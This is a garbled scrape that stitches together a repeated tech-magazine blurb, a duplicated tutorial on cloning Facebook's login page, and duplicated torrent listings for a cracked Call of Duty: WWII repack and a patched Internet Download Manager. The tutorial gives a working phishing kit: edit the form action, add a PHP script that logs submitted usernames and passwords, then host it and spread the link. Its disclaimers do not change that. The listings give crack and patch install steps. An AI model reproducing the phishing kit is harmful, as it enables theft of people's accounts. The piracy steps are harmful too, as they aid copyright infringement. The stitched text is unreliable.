The objective of Computeractive is to provide ‘Simple Clear Advice In Plain English’ on all matters of technology. Computeractive writes about technology issues facing general readers in their day to day life. From buying advice on computers, mobile phones, cameras etc. to increasing productivity on Microsoft Windows to troubleshooting computers and laptops. Computeractive addresses all these through, easy to understand, step by step guides as well as in-depth articles. Technology has become part and parcel of everyday life, Computeractive helps you negotiate the tricky bits.
The objective of Computeractive is to provide ‘Simple Clear Advice In Plain English’ on all matters of technology. Computeractive writes about technology issues facing general readers in their day to day life. From buying advice on computers, mobile phones, cameras etc. to increasing productivity on Microsoft Windows to troubleshooting computers and laptops. Computeractive addresses all these through, easy to understand, step by step guides as well as in-depth articles. Technology has become part and parcel of everyday life, Computeractive helps you negotiate the tricky bits.
The objective of Computeractive is to provide ‘Simple Clear Advice In Plain English’ on all matters of technology. Computeractive writes about technology issues facing general readers in their day to day life. From buying advice on computers, mobile phones, cameras etc. to increasing productivity on Microsoft Windows to troubleshooting computers and laptops. Computeractive addresses all these through, easy to understand, step by step guides as well as in-depth articles. Technology has become part and parcel of everyday life, Computeractive helps you negotiate the tricky bits.
In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.
What is Phishing?
Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:
A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.
However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.
- Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
- Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
- If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
- You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
- Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
- Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
- Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
- At this point, you should now have two files saved: index.htm and post.php.
- Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost.
- After you have signed up for an account, browse to the control panel, and then to file manager.
- Once the window opens, go to publick_html.
- Delete default.php, and then upload index.htm and post.php.
- Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
- The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
- Now go back to the file manager and public_html. There should be a file labeled username.txt.
- Open this file and you should be able to see login credentials that have been entered by a test user.
Final Thoughts
It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.
In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.
If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.
What is Phishing?
Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:
A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.
However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.
- Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
- Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
- If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
- You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
- Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
- Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
- Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
- At this point, you should now have two files saved: index.htm and post.php.
- Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost.
- After you have signed up for an account, browse to the control panel, and then to file manager.
- Once the window opens, go to publick_html.
- Delete default.php, and then upload index.htm and post.php.
- Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
- The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
- Now go back to the file manager and public_html. There should be a file labeled username.txt.
- Open this file and you should be able to see login credentials that have been entered by a test user.
Final Thoughts
It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.
Call of Duty: WWII
Release Date: November 3, 2017
Genres/Tags: Action, Shooter, First-person, 3D
Developer: Sledgehammer Games, Raven Software
Publisher: Activision
Platform: PC [Repack]
Engine: in-house
Steam User Rating: 61% of user reviews are positive (based on 1,532 reviews)
Interface Language: English, French, Italian, German, Spanish, Japanese, Polish, Portuguese-Brazil, Russian, Simplified Chinese
Audio Language: English, French, Italian, German, Spanish, Polish, Portuguese-Brazil, Russian
Crack: built-in (Koncept)
Minimum requirements:
Operating System: Windows 7 64-Bit or later
Processor: Intel® Core™ i3 3225 3.3 GHz or AMD Ryzen™ 5 1400
RAM: 8 GB
Video Card: NVIDIA® GeForce® GTX 660 @ 2 GB / GTX 1050 or ATI® Radeon™ HD 7850 @ 2GB / AMD RX 550
DirectX: 11
HDD Space: up to 62 GB
ATTENTION! The minimum size of the repack is 27.7 GB, read repack features section for details.
Screenshots - click to enlarge If you don't see screens - disable your adblock






Description:
Call of Duty® returns to its roots with Call of Duty®: WWII - a breathtaking experience that redefines World War II for a new gaming generation. Land in Normandy on D-Day and battle across Europe through iconic locations in history’s most monumental war. Experience classic Call of Duty combat, the bonds of camaraderie, and the unforgiving nature of war against a global power throwing the world into tyranny.
Call of Duty®: WWII creates the definitive World War II next generation experience across three different game modes: Campaign, Multiplayer, and Co-Operative. Featuring stunning visuals, the Campaign transports players to the European theater as they engage in an all-new Call of Duty® story set in iconic World War II battles. Multiplayer marks a return to original, boots-on-the ground Call of Duty gameplay. Authentic weapons and traditional run-and-gun action immerse you in a vast array of World War II-themed locations. The Co-Operative mode unleashes a new and original story in a standalone game experience full of unexpected, adrenaline-pumping moments.
Repack Features
Release Date: November 3, 2017
Genres/Tags: Action, Shooter, First-person, 3D
Developer: Sledgehammer Games, Raven Software
Publisher: Activision
Platform: PC [Repack]
Engine: in-house
Steam User Rating: 61% of user reviews are positive (based on 1,532 reviews)
Interface Language: English, French, Italian, German, Spanish, Japanese, Polish, Portuguese-Brazil, Russian, Simplified Chinese
Audio Language: English, French, Italian, German, Spanish, Polish, Portuguese-Brazil, Russian
Crack: built-in (Koncept)
Minimum requirements:
Operating System: Windows 7 64-Bit or later
Processor: Intel® Core™ i3 3225 3.3 GHz or AMD Ryzen™ 5 1400
RAM: 8 GB
Video Card: NVIDIA® GeForce® GTX 660 @ 2 GB / GTX 1050 or ATI® Radeon™ HD 7850 @ 2GB / AMD RX 550
DirectX: 11
HDD Space: up to 62 GB
ATTENTION! The minimum size of the repack is 27.7 GB, read repack features section for details.
Screenshots - click to enlarge If you don't see screens - disable your adblock
Description:
Call of Duty® returns to its roots with Call of Duty®: WWII - a breathtaking experience that redefines World War II for a new gaming generation. Land in Normandy on D-Day and battle across Europe through iconic locations in history’s most monumental war. Experience classic Call of Duty combat, the bonds of camaraderie, and the unforgiving nature of war against a global power throwing the world into tyranny.
Call of Duty®: WWII creates the definitive World War II next generation experience across three different game modes: Campaign, Multiplayer, and Co-Operative. Featuring stunning visuals, the Campaign transports players to the European theater as they engage in an all-new Call of Duty® story set in iconic World War II battles. Multiplayer marks a return to original, boots-on-the ground Call of Duty gameplay. Authentic weapons and traditional run-and-gun action immerse you in a vast array of World War II-themed locations. The Co-Operative mode unleashes a new and original story in a standalone game experience full of unexpected, adrenaline-pumping moments.
Repack Features
- Based on Steam version v1.3: 88.9 GB
- Koncept crack applied over
- 100% Lossless & MD5 Perfect: all files are identical to originals after installation (but for multiplayer/zombie files)
- Multiplayer and zombie files ripped (as they aren't playable at the moment), NOTHING re-encoded
- Selective Download feature: you may skip downloading and installing of languages you don't need
- Significantly smaller archive size (compressed from 88.9 to 27.7~46 GB, depending on selected languages)
- Installation takes from 45 minutes to 1.5 hours (depending on your system)
- After-install integrity check so you could make sure that everything installed properly
- HDD space after installation: up to 62 GB
- At least 2 GB of free RAM (inc. virtual) required for installing this repack
- ATTENTION! If you're installing this repack under Windows 10, run setup with compatibility set to Windows 7
- If you're installing more than one language, remember to move ALL language folder but one you need to "temp" folder. In example, if you install "english" and "russian", move "english" folder to "temp" one to play in Russian and vice versa. Japanese and Chinese languages require "english" folder present, but all .fd/.ff files must be removed from it (only .toc and .pak should be inside)
- Repack by FitGirl
Selective Download
You can skip downloading of language packs you don't need. Here is the list of selective files:
- fg-selective-english.bin (also REQUIRED for Japanese and Chinese installations)
- fg-selective-brazilian.bin
- fg-selective-chinese.bin
- fg-selective-french.bin
- fg-selective-german.bin
- fg-selective-italian.bin
- fg-selective-japanese.bin
- fg-selective-polish.bin
- fg-selective-russian.bin
- fg-selective-spanish.bin
In example, if you want to launch the game with Spanish UI/Subtitles/Voiceovers - skip all "selective" files, but download fg-selective-spanish.bin & all main files (01-06).
Problems during installation?
Read this repacks troubleshooting guide
http://fitgirl-repacks.site/repacks-troubleshooting/

source: https://1337x.to/torrent/2566981/Call-of-Duty-WWII-MULTi10-FitGirl-Rip-Selective-Download-from-27-7-GB/
Call of Duty: WWII
Release Date: November 3, 2017
Genres/Tags: Action, Shooter, First-person, 3D
Developer: Sledgehammer Games, Raven Software
Publisher: Activision
Platform: PC [Repack]
Engine: in-house
Steam User Rating: 61% of user reviews are positive (based on 1,532 reviews)
Interface Language: English, French, Italian, German, Spanish, Japanese, Polish, Portuguese-Brazil, Russian, Simplified Chinese
Audio Language: English, French, Italian, German, Spanish, Polish, Portuguese-Brazil, Russian
Crack: built-in (Koncept)
Minimum requirements:
Operating System: Windows 7 64-Bit or later
Processor: Intel® Core™ i3 3225 3.3 GHz or AMD Ryzen™ 5 1400
RAM: 8 GB
Video Card: NVIDIA® GeForce® GTX 660 @ 2 GB / GTX 1050 or ATI® Radeon™ HD 7850 @ 2GB / AMD RX 550
DirectX: 11
HDD Space: up to 62 GB
ATTENTION! The minimum size of the repack is 27.7 GB, read repack features section for details.
Screenshots - click to enlarge If you don't see screens - disable your adblock






Description:
Call of Duty® returns to its roots with Call of Duty®: WWII - a breathtaking experience that redefines World War II for a new gaming generation. Land in Normandy on D-Day and battle across Europe through iconic locations in history’s most monumental war. Experience classic Call of Duty combat, the bonds of camaraderie, and the unforgiving nature of war against a global power throwing the world into tyranny.
Call of Duty®: WWII creates the definitive World War II next generation experience across three different game modes: Campaign, Multiplayer, and Co-Operative. Featuring stunning visuals, the Campaign transports players to the European theater as they engage in an all-new Call of Duty® story set in iconic World War II battles. Multiplayer marks a return to original, boots-on-the ground Call of Duty gameplay. Authentic weapons and traditional run-and-gun action immerse you in a vast array of World War II-themed locations. The Co-Operative mode unleashes a new and original story in a standalone game experience full of unexpected, adrenaline-pumping moments.
Repack Features
Release Date: November 3, 2017
Genres/Tags: Action, Shooter, First-person, 3D
Developer: Sledgehammer Games, Raven Software
Publisher: Activision
Platform: PC [Repack]
Engine: in-house
Steam User Rating: 61% of user reviews are positive (based on 1,532 reviews)
Interface Language: English, French, Italian, German, Spanish, Japanese, Polish, Portuguese-Brazil, Russian, Simplified Chinese
Audio Language: English, French, Italian, German, Spanish, Polish, Portuguese-Brazil, Russian
Crack: built-in (Koncept)
Minimum requirements:
Operating System: Windows 7 64-Bit or later
Processor: Intel® Core™ i3 3225 3.3 GHz or AMD Ryzen™ 5 1400
RAM: 8 GB
Video Card: NVIDIA® GeForce® GTX 660 @ 2 GB / GTX 1050 or ATI® Radeon™ HD 7850 @ 2GB / AMD RX 550
DirectX: 11
HDD Space: up to 62 GB
ATTENTION! The minimum size of the repack is 27.7 GB, read repack features section for details.
Screenshots - click to enlarge If you don't see screens - disable your adblock
Description:
Call of Duty® returns to its roots with Call of Duty®: WWII - a breathtaking experience that redefines World War II for a new gaming generation. Land in Normandy on D-Day and battle across Europe through iconic locations in history’s most monumental war. Experience classic Call of Duty combat, the bonds of camaraderie, and the unforgiving nature of war against a global power throwing the world into tyranny.
Call of Duty®: WWII creates the definitive World War II next generation experience across three different game modes: Campaign, Multiplayer, and Co-Operative. Featuring stunning visuals, the Campaign transports players to the European theater as they engage in an all-new Call of Duty® story set in iconic World War II battles. Multiplayer marks a return to original, boots-on-the ground Call of Duty gameplay. Authentic weapons and traditional run-and-gun action immerse you in a vast array of World War II-themed locations. The Co-Operative mode unleashes a new and original story in a standalone game experience full of unexpected, adrenaline-pumping moments.
Repack Features
- Based on Steam version v1.3: 88.9 GB
- Koncept crack applied over
- 100% Lossless & MD5 Perfect: all files are identical to originals after installation (but for multiplayer/zombie files)
- Multiplayer and zombie files ripped (as they aren't playable at the moment), NOTHING re-encoded
- Selective Download feature: you may skip downloading and installing of languages you don't need
- Significantly smaller archive size (compressed from 88.9 to 27.7~46 GB, depending on selected languages)
- Installation takes from 45 minutes to 1.5 hours (depending on your system)
- After-install integrity check so you could make sure that everything installed properly
- HDD space after installation: up to 62 GB
- At least 2 GB of free RAM (inc. virtual) required for installing this repack
- ATTENTION! If you're installing this repack under Windows 10, run setup with compatibility set to Windows 7
- If you're installing more than one language, remember to move ALL language folder but one you need to "temp" folder. In example, if you install "english" and "russian", move "english" folder to "temp" one to play in Russian and vice versa. Japanese and Chinese languages require "english" folder present, but all .fd/.ff files must be removed from it (only .toc and .pak should be inside)
- Repack by FitGirl
Selective Download
You can skip downloading of language packs you don't need. Here is the list of selective files:
- fg-selective-english.bin (also REQUIRED for Japanese and Chinese installations)
- fg-selective-brazilian.bin
- fg-selective-chinese.bin
- fg-selective-french.bin
- fg-selective-german.bin
- fg-selective-italian.bin
- fg-selective-japanese.bin
- fg-selective-polish.bin
- fg-selective-russian.bin
- fg-selective-spanish.bin
In example, if you want to launch the game with Spanish UI/Subtitles/Voiceovers - skip all "selective" files, but download fg-selective-spanish.bin & all main files (01-06).
Problems during installation?
Read this repacks troubleshooting guide
http://fitgirl-repacks.site/repacks-troubleshooting/
source: https://1337x.to/torrent/2566981/Call-of-Duty-WWII-MULTi10-FitGirl-Rip-Selective-Download-from-27-7-GB/
Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
What's new in version 6.28 build 9
(Released: May 2, 2017)
>Fixed problem with erroneous interceptions of files in Firefox
How to Install:
Method 1:
1. Install idm by running "idman628build9.exe"
2. Run Patch.exe from Patch 1 folder and install it
3. Done
Method 2:
1. Install idm by running "idman628build9.exe"
2. Run "32bit Patch build 9.exe" from Patch 2 folder if you're using 32bit operating system
or
Run "64bit Patch build 9.exe" from Patch 2 folder if you're using 64bit operating system
3. Done. Enjoy simplest IDM installation ever
4. To uninstall this Patch just go, find and run IDM Patch Uninstaller.exe and follow instructions

source: https://1337x.to/torrent/2193270/Internet-Download-Manager-IDM-6-28-Build-9-Registered-32bit-64bit-Patch-CrackingPatching/
Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
What's new in version 6.28 build 9
(Released: May 2, 2017)
>Fixed problem with erroneous interceptions of files in Firefox
How to Install:
Method 1:
1. Install idm by running "idman628build9.exe"
2. Run Patch.exe from Patch 1 folder and install it
3. Done
Method 2:
1. Install idm by running "idman628build9.exe"
2. Run "32bit Patch build 9.exe" from Patch 2 folder if you're using 32bit operating system
or
Run "64bit Patch build 9.exe" from Patch 2 folder if you're using 64bit operating system
3. Done. Enjoy simplest IDM installation ever
4. To uninstall this Patch just go, find and run IDM Patch Uninstaller.exe and follow instructions
source: https://1337x.to/torrent/2193270/Internet-Download-Manager-IDM-6-28-Build-9-Registered-32bit-64bit-Patch-CrackingPatching/





